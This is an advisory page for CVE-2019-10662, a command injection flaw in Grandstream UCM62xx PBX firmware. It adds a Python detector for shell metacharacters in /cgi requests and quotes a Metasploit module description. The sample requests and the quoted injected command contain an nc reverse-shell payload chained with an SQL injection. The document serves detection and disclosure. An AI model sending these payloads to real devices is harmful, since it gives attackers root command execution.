CVSSv3 8.8

CVE-2019-10662

Published: 30/03/2019 Updated: 01/03/2023
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 940
CVSS v2 Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C
CVSS v3 Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Vulnerability Summary

Grandstream UCM6204 devices with firmware before 1.0.19.20 allow remote authenticated users to execute arbitrary code via shell metacharacters in the backupUCMConfig file-backup parameter sent to the /cgi? URI.
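The weakness is a request parameter that ends up inside a command line built for /bin/sh, so the cheapest detection is to URL-decode every /cgi parameter and flag shell metacharacters in the value. The following is an added example written for this page (not Vulmon's, Grandstream's or Metasploit's code). It assumes the UCM web CGI dispatches on an action= parameter and that the log source records request bodies (a proxy or WAF; a plain access log does not); the sample lines are constructed, and the reverse-shell payload in them is the nc string quoted in the Metasploit description further down this page. The username field name is an assumption.

```python
"""Flag UCM62xx /cgi requests whose parameters carry shell metacharacters.

Added example for this page, not Vulmon's, Grandstream's or Metasploit's code.
Assumptions: the UCM web CGI dispatches on an 'action=' parameter, and the
constructed lines below are "METHOD target body" with '-' for no body
(a proxy or WAF log; ordinary access logs do not record POST bodies).
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Characters that let a parameter value escape a command line built for /bin/sh.
META = re.compile(r"[`$;|&<>(){}\n]")

# Endpoints this page associates with command injection (action names assumed).
RISKY_ACTIONS = {"backupUCMConfig", "sendPasswordEmail"}

# Constructed sample traffic; the 'username' field name is an assumption.
# Line 2 and 3 carry the nc reverse-shell payload quoted on this page.
SAMPLE = [
    "GET /cgi?action=backupUCMConfig&file-backup=backup_20190330.tar -",
    "GET /cgi?action=backupUCMConfig&file-backup=x%60nc%2010.0.0.3%204444%20-e%20%2Fbin%2Fsh%60 -",
    "POST /cgi action=sendPasswordEmail&username=z%27%20or%201%3D1--%60%3B%60nc%2010.0.0.3%204444%20-e%20%2Fbin%2Fsh%60%3B%60",
    "POST /cgi action=login&username=admin&password=admin",
]


def parse_request(line):
    """Return (method, path, [(name, decoded_value), ...]) for one sample line."""
    method, target, body = (line.split(" ", 2) + ["", ""])[:3]
    url = urlsplit(target)
    params = parse_qsl(url.query, keep_blank_values=True)
    if method == "POST" and body not in ("", "-"):
        params += parse_qsl(body, keep_blank_values=True)
    return method, url.path, params


def findings(line):
    """Metacharacter hits in one request; empty list when nothing is suspicious."""
    method, path, params = parse_request(line)
    if path != "/cgi":
        return []
    action = next((v for k, v in params if k == "action"), "")
    hits = []
    for name, value in params:
        if name == "action":
            continue
        # parse_qsl already decoded the value, so %60 is matched as a backtick.
        metas = sorted(set(META.findall(value)))
        if metas:
            hits.append({
                "method": method,
                "action": action,
                "param": name,
                "meta": metas,
                "known_vuln_action": action in RISKY_ACTIONS,
            })
    return hits


def scan(lines):
    """Run findings() over a batch of lines and flatten the result."""
    return [hit for line in lines for hit in findings(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Decoding before matching is the point: an attacker will percent-encode the backticks, and a rule that greps the raw request line for `` ` `` or `;` sees nothing. The known_vuln_action flag separates the two endpoints this page names from generic noise, but any /cgi parameter with metacharacters is worth a look on a PBX that builds shell commands from request input.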

Vulnerable Products

grandstream ucm6204_firmware

Exploits

This Metasploit module exploits an unauthenticated SQL injection vulnerability and a command injection vulnerability affecting the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an unauthenticated remote attacker to execute commands as root ...

Metasploit Modules

Grandstream UCM62xx IP PBX sendPasswordEmail RCE

This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE, but it was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an unauthenticated remote attacker to execute commands as root. Exploitation happens in two stages:

1. An SQL injection during username lookup while executing the "Forgot Password" function.
2. A command injection that occurs after the user-provided username is passed to a Python script via the shell. Like so:

    /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
    password '' `cat <<'TTsf7G0'
    z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;`
    TTsf7G0
    `

This module affects UCM62xx versions before firmware version 1.0.19.20.

msf > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
msf exploit(grandstream_ucm62xx_sendemail_rce) > show targets
    ...targets...
msf exploit(grandstream_ucm62xx_sendemail_rce) > set TARGET < target-id >
msf exploit(grandstream_ucm62xx_sendemail_rce) > show options
    ...show and set options...
msf exploit(grandstream_ucm62xx_sendemail_rce) > exploit